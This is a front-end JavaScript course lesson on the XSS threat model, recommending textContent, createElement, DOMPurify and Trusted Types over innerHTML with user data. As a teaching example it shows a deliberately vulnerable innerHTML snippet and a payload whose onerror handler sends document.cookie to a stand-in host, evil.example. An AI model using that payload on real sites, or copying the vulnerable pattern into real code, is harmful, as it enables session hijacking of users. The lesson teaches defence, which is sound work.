lesson 10

Sanitization and the XSS threat model

Why innerHTML with user data is dangerous, what an XSS attack actually does, and the safe alternatives.

~ 15 min read·lesson 10 of 10

0 / 10

You finished a course on the DOM. You know how to read it, change it, listen to it, and update it without breaking accessibility. The last skill is the one that keeps you out of incident reports: don't ship cross-site scripting holes.

Cross-site scripting (XSS) is the family of bugs where an attacker gets your page to run JavaScript they wrote. They do not need to break into your server; they only need to get your page to insert a string they control as if it were code. From there, your user is the victim — the attacker now runs in their session.

The good news: the rule that prevents almost all of it is the same rule lesson 3 introduced. This lesson explains why that rule matters and what to do in the cases where you cannot follow it as-is.

What XSS actually does

Imagine your app shows a comment under each blog post. You read the comment text from a database and insert it into the page like this:

vulnerable.js

// DON'T:
const el = document.querySelector('.comment');
el.innerHTML = comment.text;

A friendly comment is just text and renders as text. Now suppose someone posts a comment whose content is:

payload.html

<img src="x" onerror="fetch('https://evil.example/steal?c=' + document.cookie)">

The browser parses that string as HTML. It builds a real <img> element. The src="x" is invalid, so the image fails to load — and that triggers the onerror handler, which fires a request to the attacker's server with the user's cookies attached. Every visitor who reads that comment quietly hands over their session.

That is a complete XSS attack. The attacker did not touch your server. They typed text. Your page was the loaded gun; their text was the trigger; innerHTML pulled the trigger.

Other things attackers can do once they execute JavaScript in your page:

Read any data the user can read — emails, messages, account info — and send it elsewhere.
Make requests to your API as the logged-in user. Change passwords. Move money. Send messages.
Show a fake login form on your real domain to harvest credentials.

The rule of thumb for the threat model: if an attacker controls a string and your code parses it as HTML or JavaScript, the attacker now controls your page in the user's browser.

check your understanding

A username field allows arbitrary text. Your app shows the username on every page with nameEl.innerHTML = user.name. A user signs up with the name <script>alert(1)</script>. They reload the page. What happens?

The rule that prevents almost all of it

Almost every XSS bug fits the same shape: user-controlled string → parsed as HTML or JavaScript by your code. The rule that prevents almost all of those bugs is one line:

Use textContent for any string that touched user input. Reserve innerHTML for strings you wrote yourself.

If you only write text, an attacker can post <script> tags all day; you write the literal characters into a text node and the browser shows them as characters. There is no parser to trick.

The same rule extends to several lookalike methods:

element.innerHTML = userText — bad. Use textContent.
element.outerHTML = userText — bad. Same parser, more dangerous (replaces the element itself).
element.insertAdjacentHTML(pos, userText) — bad. Same parser.
document.write(userText) — bad, and write document.write out of your vocabulary altogether.
<a href={userUrl}> where userUrl could be javascript:alert(1) — bad. Validate the URL or strip the javascript: scheme.

The safe equivalents:

Text into an element: element.textContent = userText.
Build markup with user data inside: createElement for the structure, textContent for any user pieces, setAttribute (or properties) for attributes.

safe.js

// Safe construction — no parsing of user input:
const li = document.createElement('li');
li.className = 'comment';

const author = document.createElement('strong');
author.textContent = comment.author;   // text node, attacker-proof

const body = document.createElement('span');
body.textContent = comment.text;       // text node, attacker-proof

li.append(author, ': ', body);
list.append(li);

Notice what happened. We built the structure ourselves with createElement, set the user-controlled parts as text, and the browser never parsed an attacker-controlled string. There is nowhere for an attack to land.

Tip

When you find yourself building an HTML string by concatenating user input with tags, stop. That is the exact shape that creates XSS bugs. Build the elements with createElement instead, and put the user input through textContent or attribute setters.

When you do need formatting

Sometimes you genuinely need to render user-supplied content with formatting. A comment that allows bold, italic, and links. A markdown editor. A rich-text field.

You have two safe paths.

One, render through a format you control. If the user writes Markdown, parse the Markdown server-side or with a trusted Markdown library, then escape the parts that come from the user. The library produces a known-safe HTML subset; you do not parse the raw user input as HTML at all.

Two, sanitize. A sanitizer takes an HTML string and returns a stripped-down version with dangerous tags and attributes removed: no <script>, no onerror, no javascript: URLs. The standard pick is DOMPurify — a small, well-audited library that you call once per insertion.

purify.js

import DOMPurify from 'dompurify';

const clean = DOMPurify.sanitize(comment.html);
commentEl.innerHTML = clean;

The wrong way to sanitize: write your own regex-based "remove <script> tags" function. The list of dangerous patterns is long, evolving, and full of obscure cases (data: URLs, SVG event handlers, mutation XSS via parser quirks). A proper sanitizer takes years of issues and patches to ship safely. Use DOMPurify; do not invent your own.

Watch out

Sanitize on the way in and on the way out, or be very clear about which one you do. Sanitizing only on save means your stored data is clean — but a future bug could still render unsanitized data inserted by another path. Sanitizing on render is more defensive.

check your understanding

You need to show comments that include the user's bold, italic, and links. What's the safest pipeline?

Trusted Types in one paragraph

Modern browsers offer a feature called Trusted Types that bans raw strings from being assigned to dangerous sinks like innerHTML. With Trusted Types enabled (via a Content-Security-Policy header), only special "trusted" objects produced by an explicit policy can be assigned. That means: a future bug that does innerHTML = userText does not silently work — it throws a runtime error your CSP report will catch.

You do not need this on day one. You need to know it exists, and that turning it on later is one of the cleanest ways to make sure no future code reintroduces the bug class. Look it up when you have time; it is worth the read.

A short checklist

The whole lesson, in five lines:

Default to textContent. It can never execute markup.
Reach for innerHTML only with strings you wrote yourself.
For rich user content, use a sanitizer like DOMPurify — never a hand-rolled regex.
Validate URLs that come from users before assigning to href. Reject javascript:.
When in doubt, build with createElement and textContent. The browser never parses an attacker-controlled string.

check your understanding

You receive a string of HTML from an internal API that your team owns. The API was added by your team last sprint and only your team writes to it — but it serves customer-typed content. You want to render the HTML in a comment list. What is the safest pattern?

check your understanding

You spot this in code: anchor.href = profile.url, where profile.url came from a user signup. What is the smallest fix that closes a real attack?

← previousAccessibility from JavaScript10 / 10